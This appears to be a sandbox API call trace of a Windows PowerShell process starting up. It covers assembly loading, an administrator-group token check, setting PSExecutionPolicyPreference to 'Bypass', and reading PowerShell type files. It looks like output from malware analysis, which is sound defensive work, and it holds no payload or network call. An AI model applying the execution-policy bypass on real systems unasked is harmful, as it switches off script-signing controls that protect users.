	[0070.218] CoTaskMemFree (pv=0x3c3cb0) 
	[0071.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0071.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0071.906] CoTaskMemAlloc (cb=0x104) returned 0x3c3cb0
	[0071.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0071.906] CoTaskMemFree (pv=0x3c3cb0) 
	[0072.798] CoTaskMemAlloc (cb=0x104) returned 0x3c3cb0
	[0072.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0072.799] CoTaskMemFree (pv=0x3c3cb0) 
	[0073.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0073.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0082.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0082.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0085.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0085.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0088.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0095.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0095.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1dd350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0100.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.917] bsearch (_Key=0x1dacd0, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0107.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.944] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0107.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.945] CoTaskMemFree (pv=0x3c3ed0) 
	[0107.948] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0107.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.948] CoTaskMemFree (pv=0x3c3ed0) 
	[0107.948] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0107.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.948] CoTaskMemFree (pv=0x3c3ed0) 
	[0107.951] CoCreateGuid (in: pguid=0x1ddab8 | out: pguid=0x1ddab8*(Data1=0x9df43d1c, Data2=0xe773, Data3=0x4aa2, Data4=([0]=0x83, [1]=0xa0, [2]=0x31, [3]=0x11, [4]=0x9a, [5]=0xef, [6]=0x30, [7]=0x3e))) returned 0x0
	[0108.595] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0108.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.595] CoTaskMemFree (pv=0x3c3ed0) 
	[0108.598] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0108.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.598] CoTaskMemFree (pv=0x3c3ed0) 
	[0109.145] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0109.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.145] CoTaskMemFree (pv=0x3c3ed0) 
	[0109.150] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0109.152] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1dd760 | out: lpConsoleScreenBufferInfo=0x1dd760) returned 1
	[0109.156] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0109.157] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1dd760 | out: lpConsoleScreenBufferInfo=0x1dd760) returned 1
	[0109.158] GetVersionExW (in: lpVersionInformation=0x1dd6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1dd6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0109.160] GetCurrentProcess () returned 0xffffffffffffffff
	[0109.161] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1dd788 | out: TokenHandle=0x1dd788*=0x1d4) returned 1
	[0109.164] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1dd6a8 | out: TokenInformation=0x0, ReturnLength=0x1dd6a8) returned 0
	[0109.165] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d38c0
	[0109.165] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x3d38c0, TokenInformationLength=0x4, ReturnLength=0x1dd6a8 | out: TokenInformation=0x3d38c0, ReturnLength=0x1dd6a8) returned 1
	[0109.167] DuplicateTokenEx (in: hExistingToken=0x1d4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1dd808 | out: phNewToken=0x1dd808*=0x1cc) returned 1
	[0109.167] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1dd6a8 | out: TokenInformation=0x0, ReturnLength=0x1dd6a8) returned 0
	[0109.167] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d3af0
	[0109.167] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x3d3af0, TokenInformationLength=0x4, ReturnLength=0x1dd6a8 | out: TokenInformation=0x3d3af0, ReturnLength=0x1dd6a8) returned 1
	[0109.168] CheckTokenMembership (in: TokenHandle=0x1cc, SidToCheck=0x2ccbd28*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1dd818 | out: IsMember=0x1dd818) returned 1
	[0109.168] CloseHandle (hObject=0x1cc) returned 1
	[0109.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.654] GetConsoleWindow () returned 0x3021e
	[0136.872] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0136.877] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e8
	[0136.880] CoCreateGuid (in: pguid=0x1dd900 | out: pguid=0x1dd900*(Data1=0x4363c2d3, Data2=0x72ab, Data3=0x44ea, Data4=([0]=0x8e, [1]=0x93, [2]=0x6f, [3]=0x2f, [4]=0x8f, [5]=0x1b, [6]=0x92, [7]=0x59))) returned 0x0
	[0136.882] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0136.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.882] CoTaskMemFree (pv=0x3c3ed0) 
	[0141.988] CoTaskMemAlloc (cb=0xcc) returned 0x4698c0
	[0141.988] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x4698c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0145.722] CoTaskMemAlloc (cb=0x20c) returned 0x1b873dd0
	[0145.722] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b873dd0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0145.723] CoTaskMemFree (pv=0x1b873dd0) 
	[0145.723] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1dd000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0145.723] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0145.733] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0145.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.733] CoTaskMemFree (pv=0x3c3ed0) 
	[0145.735] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0145.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0145.735] CoTaskMemFree (pv=0x3c3ed0) 
	[0146.426] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0146.427] GetFileType (hFile=0x32c) returned 0x1
	[0146.427] SetErrorMode (uMode=0x1) returned 0x1
	[0146.427] GetFileType (hFile=0x32c) returned 0x1
	[0148.344] VirtualQuery (in: lpAddress=0x1dbdc0, lpBuffer=0x1dcc80, dwLength=0x30 | out: lpBuffer=0x1dcc80*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0149.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.483] SetErrorMode (uMode=0x1) returned 0x1
	[0149.483] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0149.483] GetFileType (hFile=0x32c) returned 0x1
	[0149.483] SetErrorMode (uMode=0x1) returned 0x1
	[0149.484] GetFileType (hFile=0x32c) returned 0x1
	[0149.484] ReadFile (in: hFile=0x32c, lpBuffer=0x2dba018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2dba018*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.484] ReadFile (in: hFile=0x32c, lpBuffer=0x2dba018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2dba018*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.485] ReadFile (in: hFile=0x32c, lpBuffer=0x2dba018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2dba018*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.496] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.496] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.496] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.496] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.496] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.497] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.498] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.498] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
